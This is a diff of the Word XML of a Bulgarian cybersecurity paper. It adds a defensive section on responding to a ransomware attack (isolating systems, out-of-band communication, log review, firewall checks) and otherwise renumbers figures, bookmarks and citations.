@@ -7361,7 +7721,7 @@
           <w:numId w:val="6"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="23" w:name="_Toc223385520"/>
+      <w:bookmarkStart w:id="24" w:name="_Toc223468480"/>
       <w:r>
         <w:t xml:space="preserve">Подготовка за </w:t>
       </w:r>
@@ -7374,7 +7734,7 @@
       <w:r>
         <w:t xml:space="preserve"> инциденти</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="23"/>
+      <w:bookmarkEnd w:id="24"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7575,7 +7935,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="24" w:name="_Toc223385521"/>
+      <w:bookmarkStart w:id="25" w:name="_Toc223468481"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Превенция </w:t>
@@ -7595,7 +7955,7 @@
       <w:r>
         <w:t>уязвимости</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="24"/>
+      <w:bookmarkEnd w:id="25"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7898,7 +8258,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId23"/>
+                    <a:blip r:embed="rId24"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -7924,28 +8284,18 @@
         <w:pStyle w:val="Caption"/>
         <w:jc w:val="left"/>
       </w:pPr>
-      <w:bookmarkStart w:id="25" w:name="_Toc223382615"/>
+      <w:bookmarkStart w:id="26" w:name="_Toc223382615"/>
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>23</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>24</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -7995,65 +8345,37 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> на internet-facing vulnerabilities. </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>на</w:t>
+        <w:t>Експлоатация</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> internet-facing vulnerabilities. </w:t>
+        <w:t xml:space="preserve"> на </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Експлоатация</w:t>
+        <w:t>услуги</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>на</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>услуги</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="25"/>
+      <w:bookmarkEnd w:id="26"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8081,7 +8403,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId24"/>
+                    <a:blip r:embed="rId25"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -8107,28 +8429,18 @@
         <w:pStyle w:val="Caption"/>
         <w:jc w:val="left"/>
       </w:pPr>
-      <w:bookmarkStart w:id="26" w:name="_Toc223382616"/>
+      <w:bookmarkStart w:id="27" w:name="_Toc223382616"/>
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>24</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>25</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t>: Д</w:t>
       </w:r>
@@ -8154,7 +8466,7 @@
       <w:r>
         <w:t>.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="26"/>
+      <w:bookmarkEnd w:id="27"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8168,7 +8480,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="27" w:name="_Toc223385522"/>
+      <w:bookmarkStart w:id="28" w:name="_Toc223468482"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Компрометирани </w:t>
@@ -8176,7 +8488,7 @@
       <w:r>
         <w:t>пароли</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="27"/>
+      <w:bookmarkEnd w:id="28"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8228,15 +8540,7 @@
         <w:t xml:space="preserve">Multi factor authentication </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">заменят процеса с двете пароли към аутентикация с пръстов отпечатък, лицево разпознаване, ПИН на устройството или </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>криптографичен</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ключ. </w:t>
+        <w:t xml:space="preserve">заменят процеса с двете пароли към аутентикация с пръстов отпечатък, лицево разпознаване, ПИН на устройството или криптографичен ключ. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8565,7 +8869,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId25"/>
+                    <a:blip r:embed="rId26"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -8594,35 +8898,25 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="28" w:name="_Toc223382617"/>
+      <w:bookmarkStart w:id="29" w:name="_Toc223382617"/>
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>25</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>26</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
       <w:r>
         <w:t>Диаграма защо използването на пароли по подразбиране не е препоръчително.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="28"/>
+      <w:bookmarkEnd w:id="29"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8638,7 +8932,7 @@
       <w:r>
         <w:br w:type="page"/>
       </w:r>
-      <w:bookmarkStart w:id="29" w:name="_Toc223385523"/>
+      <w:bookmarkStart w:id="30" w:name="_Toc223468483"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -8649,7 +8943,7 @@
       <w:r>
         <w:t>атаки</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="29"/>
+      <w:bookmarkEnd w:id="30"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8695,7 +8989,10 @@
         <w:t xml:space="preserve">Липсва обръщение към </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">получаващия </w:t>
+        <w:t>получателя</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>– това не винаги е приложимо, ако потребителят е таргетиран може да припознае и лична информация свързано с него.</w:t>
@@ -8829,7 +9126,7 @@
             <w:rPr>
               <w:noProof/>
             </w:rPr>
-            <w:t>[9]</w:t>
+            <w:t>[11]</w:t>
           </w:r>
           <w:r>
             <w:fldChar w:fldCharType="end"/>
@@ -8862,7 +9159,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId26"/>
+                    <a:blip r:embed="rId27"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -8891,28 +9188,18 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="30" w:name="_Toc223382618"/>
+      <w:bookmarkStart w:id="31" w:name="_Toc223382618"/>
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>26</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>27</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -8927,7 +9214,7 @@
       <w:r>
         <w:t xml:space="preserve"> фишинг имейл в Outlook.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="30"/>
+      <w:bookmarkEnd w:id="31"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8940,7 +9227,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="31" w:name="_Toc223385524"/>
+      <w:bookmarkStart w:id="32" w:name="_Toc223468484"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Други форми на </w:t>
@@ -8951,7 +9238,7 @@
         </w:rPr>
         <w:t>Social Engineering</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="31"/>
+      <w:bookmarkEnd w:id="32"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9148,7 +9435,7 @@
             <w:rPr>
               <w:noProof/>
             </w:rPr>
-            <w:t>[9]</w:t>
+            <w:t>[11]</w:t>
           </w:r>
           <w:r>
             <w:fldChar w:fldCharType="end"/>
@@ -9158,19 +9445,379 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:firstLine="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
         <w:br w:type="page"/>
       </w:r>
     </w:p>
-    <w:bookmarkStart w:id="32" w:name="_Toc223385525" w:displacedByCustomXml="next"/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="33" w:name="_Toc223468485"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Какво да направим, ако станем жертва на</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ransomware</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> атака</w:t>
+      </w:r>
+      <w:r>
+        <w:t>?</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="33"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>Най-важното е да се уведомят всички участниците в дадена мрежа. Независимо дали са част от организация или в домашна среда. В случай, че засегнатият е част от организация веднага да се вдигне ескалация на по-висока инстанция. Оттам ще се включат и съответните екипи. Много е важно да се уведомят и всички засегнати клиенти.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Ето някои стъпки, които биха били полезни при подобна атака:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Веднага да се определят засегнатите системи  и да се изолират. Ако множество системи и/или </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">subnets </w:t>
+      </w:r>
+      <w:r>
+        <w:t>са компрометирани трябва да се изключат от мрежата. В случай, че това е невъзможно</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> да се изключат самите машите поотделно. С приоритет са най-критично важните системи. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Друг вариант, ако не може да се изключат от мрежата е да се извади мрежовия кабел </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(ethernet)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и да се изключат всички устройства свързани с </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Wi-Fi. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Целта е да се ограничи разпространяването.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">За ресурси намиращи се в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>cloud</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> да се направят </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>snapshot-</w:t>
+      </w:r>
+      <w:r>
+        <w:t>и на дисковете. Ще бъде от полза по-късно, когато се прави криминално разследване.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>След първоначалната атака киберпрестъпниците могат да имат достъп до вътрешните комуникации и да реагират на всяко едно предприето действие. За това комуникацията трябва да се извършва извънмрежово (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>out-of-band)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, например телефонни разговори.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Изключване на устройствата, ако по никакъв начин не могат да се изолират. Това вероятно ще унищожи и доказателства, понеже част от доказателствата се съхраняват и в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">RAM </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">паметта. Да се прилага само в крайни случаи. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Ако има системите, които не са засегнати, да се отделят.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Прегледайте всички възможни системни, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>EDR, IDS, IPS</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>логове</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ransomware</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> е само финалната част, трябва да се прегледат по-ранни </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>компроментации</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. Много е вероятно да има други </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dropper</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> злонамерени софтуери. Трябва да бъдат отстранени преди възстановяване на системата.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Всякакви новосъздадени акаунти, ескалирани привилегии или много често </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> файлове трябва да бъдат отстранени.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Да се наблюдава изпълнението на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> команди, използването на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>RMM</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> софтуер, неочаквани комуникации по мрежата и извличане на </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>креденшъли</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Ако има неочаквано голям изходящ трафик, най-вероятно се извличат незаконно данни.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">За облачна инфраструктура да се провери дали на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>firewall</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-а не е зададено правило 0.0.0.0/0, което дава достъп на всеки от интернет да влезне.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:id w:val="-2139088710"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> CITATION Sto \l 1026 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>[1]</w:t>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:bookmarkStart w:id="34" w:name="_Toc223468486" w:displacedByCustomXml="next"/>
     <w:sdt>
       <w:sdtPr>
         <w:rPr>
@@ -9198,7 +9845,7 @@
           <w:r>
             <w:t>Цитирани източници</w:t>
           </w:r>
-          <w:bookmarkEnd w:id="32"/>
+          <w:bookmarkEnd w:id="34"/>
         </w:p>
         <w:p>
           <w:pPr>
@@ -9235,7 +9882,7 @@
           </w:tblGrid>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="1033652386"/>
+              <w:divId w:val="724986744"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -9283,7 +9930,7 @@
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="1033652386"/>
+              <w:divId w:val="724986744"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -9329,7 +9976,7 @@
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="1033652386"/>
+              <w:divId w:val="724986744"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -9375,7 +10022,7 @@
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="1033652386"/>
+              <w:divId w:val="724986744"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -9421,7 +10068,7 @@
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="1033652386"/>
+              <w:divId w:val="724986744"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -9467,7 +10114,7 @@
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="1033652386"/>
+              <w:divId w:val="724986744"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -9513,7 +10160,7 @@
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="1033652386"/>
+              <w:divId w:val="724986744"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -9559,7 +10206,7 @@
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="1033652386"/>
+              <w:divId w:val="724986744"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -9605,7 +10252,7 @@
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="1033652386"/>
+              <w:divId w:val="724986744"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -9644,14 +10291,14 @@
                   <w:rPr>
                     <w:noProof/>
                   </w:rPr>
-                  <w:t>C. M. University, „Social Engineering,“ [Онлайн]. Available: https://www.cmu.edu/iso/aware/dont-take-the-bait/social-engineering.html.</w:t>
+                  <w:t>B. Robb, „AI and Ransomware Prevention: How Smart Tech can Outsmart Cybercriminals,“ BlackFog, 24 06 2025. [Онлайн]. Available: https://www.blackfog.com/ai-and-ransomware-prevention-how-smart-tech-can-outsmart-cybercriminals.</w:t>
                 </w:r>
               </w:p>
             </w:tc>
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="1033652386"/>
+              <w:divId w:val="724986744"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -9690,14 +10337,14 @@
                   <w:rPr>
                     <w:noProof/>
                   </w:rPr>
-                  <w:t>„Botnet,“ Eset, [Онлайн]. Available: https://help.eset.com/glossary/bg-BG/botnet.html.</w:t>
+                  <w:t>„Spring Security Crypto Module,“ Spring, [Онлайн]. Available: https://docs.spring.io/spring-security/reference/features/integrations/cryptography.html.</w:t>
                 </w:r>
               </w:p>
             </w:tc>
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="1033652386"/>
+              <w:divId w:val="724986744"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -9736,7 +10383,7 @@
                   <w:rPr>
                     <w:noProof/>
                   </w:rPr>
-                  <w:t>„CC Server,“ Eset, [Онлайн]. Available: https://help.eset.com/glossary/bg-BG/cc_server.html.</w:t>
+                  <w:t>C. M. University, „Social Engineering,“ [Онлайн]. Available: https://www.cmu.edu/iso/aware/dont-take-the-bait/social-engineering.html.</w:t>
                 </w:r>
               </w:p>
             </w:tc>
@@ -9744,7 +10391,7 @@
         </w:tbl>
         <w:p>
           <w:pPr>
-            <w:divId w:val="1033652386"/>
+            <w:divId w:val="724986744"/>
             <w:rPr>
               <w:rFonts w:eastAsia="Times New Roman"/>
               <w:noProof/>
@@ -10280,6 +10927,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="24A04B5A"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="EBBC4616"/>
+    <w:lvl w:ilvl="0" w:tplc="04020001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04020003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04020005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04020001" w:tentative="1">
